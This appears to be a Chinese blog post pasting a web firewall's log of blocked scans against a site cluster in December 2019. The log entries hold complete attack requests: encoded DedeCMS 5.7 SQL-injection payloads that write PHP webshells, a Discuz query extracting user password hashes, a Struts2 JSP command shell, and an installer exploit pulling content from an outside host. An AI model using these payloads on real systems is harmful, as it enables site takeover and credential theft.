plusmybak.php,日常被扫web

最新推荐文章于 2023-01-17 08:00:00 发布
最新推荐文章于 2023-01-17 08:00:00 发布
阅读量307 收藏
点赞数
文章标签: plusmybak.php

扫描内容如下: 内容太多基本省略! 基本都是老程序oday和一句话后门!

站群,2019-12-04 03:00:52,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/config/AspCms_Config.asp, 触发规则:301::一句话木马利用工具防护二(ASP), 可疑行为:Execute("Execute(""On,已被拦截。

站群,2019-12-04 03:00:52,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/plugins/weathermap/configs/test404.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 03:00:52,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/plugins/weathermap/editor.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval%28$_POST,已被拦截。

站群,2019-12-04 03:00:52,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/plus/mybak.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 03:00:51,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-04 03:00:51,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/plus/90sec.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 03:00:51,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-04 03:00:51,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/plus/erraddsave.php, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-04 03:00:51,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/data/92test.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 03:00:50,防文件下载,118.24.99.248(中国广东) 访问 三号号域名/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/92test.php&updateHost=http://api.appsmac.org/dedecms/demodata.a.txt, 触发规则:下载保护, 可疑行为:bak,已被拦截。

站群,2019-12-04 03:00:50,防SQL注入,118.24.99.248(中国广东) 访问 三号号域名/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(username,0x3a,password,0x3a,salt) from uc_members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a), 触发规则:109::对数据库进行数据查询操作防护, 可疑行为:select 1 from (select count(*),concat((select concat(username,0x3a,password,0x3a,salt) from uc_members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),已被拦截。

站群,2019-12-04 03:00:50,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/utility/convert/data/config.inc.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 03:00:50,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/admin/ping.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 03:00:40,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/shell.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 03:00:38,防SQL注入,118.24.99.248(中国广东) 访问 三号号域名/struts2-showcase/filedownload/index.action?method:&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=/&reqobj=test.jsp&content=gif89a");  while((a=in.read(b))!=-1){  out.println(new String(b));  }  out.print("");  } >, 触发规则:128::非法执行命令防护, 可疑行为:exec(request.getParameter("l")).getInputStream();  int a =  1;  byte[] b = new byte[2048];  out.print("

");  while((a=in.read(b)) = 1){  out.println(new String(b));  }  out.print("
");  } >,已被拦截。

站群,2019-12-04 03:00:36,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/email/shell.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 03:00:35,防应用程序漏洞,118.24.99.248(中国广东) 访问 三号号域名/tempplate/___index.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-05 04:56:37,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号域名/plus/moon.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-05 04:56:37,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号域名/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&ar, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-05 04:56:37,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号域名/plus/mytag_js.php?aid=9090, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-05 04:56:36,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号域名/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-05 04:56:33,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号域名/uploads/dede/sys_verifies.php?action=down, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-05 04:56:32,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号域名/utility/convert/data/config.inc.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-05 04:56:32,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号域名/plus/90sec.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-05 02:41:12,防应用程序漏洞,154.211.2.37(美国加利福尼亚州洛杉矶) 访问 二号域名/include/taglib/201907.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

站群,2019-12-05 02:41:11,防应用程序漏洞,154.211.2.37(美国加利福尼亚州洛杉矶) 访问 二号域名/include/taglib/2018gf.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

站群,2019-12-05 02:41:11,防应用程序漏洞,154.211.2.37(美国加利福尼亚州洛杉矶) 访问 二号域名/include/taglib/716.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

站群,2019-12-05 02:41:11,防应用程序漏洞,154.211.2.37(美国加利福尼亚州洛杉矶) 访问 二号域名/include/taglib/cheng.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

站群,2019-12-05 02:41:09,防应用程序漏洞,154.211.2.37(美国加利福尼亚州洛杉矶) 访问 二号域名/plus/mytag_js.php?aid=511348, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

站群,2019-12-05 02:41:08,防应用程序漏洞,154.211.2.37(美国加利福尼亚州洛杉矶) 访问 二号域名/include/taglib/ty.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

站群,2019-12-04 23:48:03,防非法请求,35.245.49.94(美国密歇根州umich.edu) 访问 185.207.154.250/, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

站群,2019-12-04 23:39:21,防应用程序漏洞,23.228.96.18(美国加利福尼亚州洛杉矶) 访问 三号号域名/plus/moon.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 23:39:21,防应用程序漏洞,23.228.96.18(美国加利福尼亚州洛杉矶) 访问 三号号域名/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&ar, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-04 23:39:20,防应用程序漏洞,23.228.96.18(美国加利福尼亚州洛杉矶) 访问 三号号域名/plus/mytag_js.php?aid=9090, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 23:39:20,防应用程序漏洞,23.228.96.18(美国加利福尼亚州洛杉矶) 访问 三号号域名/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-04 23:39:18,防应用程序漏洞,23.228.96.18(美国加利福尼亚州洛杉矶) 访问 三号号域名/uploads/dede/sys_verifies.php?action=down, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 23:39:18,防应用程序漏洞,23.228.96.18(美国加利福尼亚州洛杉矶) 访问 三号号域名/utility/convert/data/config.inc.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 23:39:17,防应用程序漏洞,23.228.96.18(美国加利福尼亚州洛杉矶) 访问 三号号域名/plus/90sec.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 20:35:15,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号号域名/plus/moon.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 20:35:14,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号号域名/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&ar, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-04 20:35:14,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号号域名/plus/mytag_js.php?aid=9090, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 20:35:13,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号号域名/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&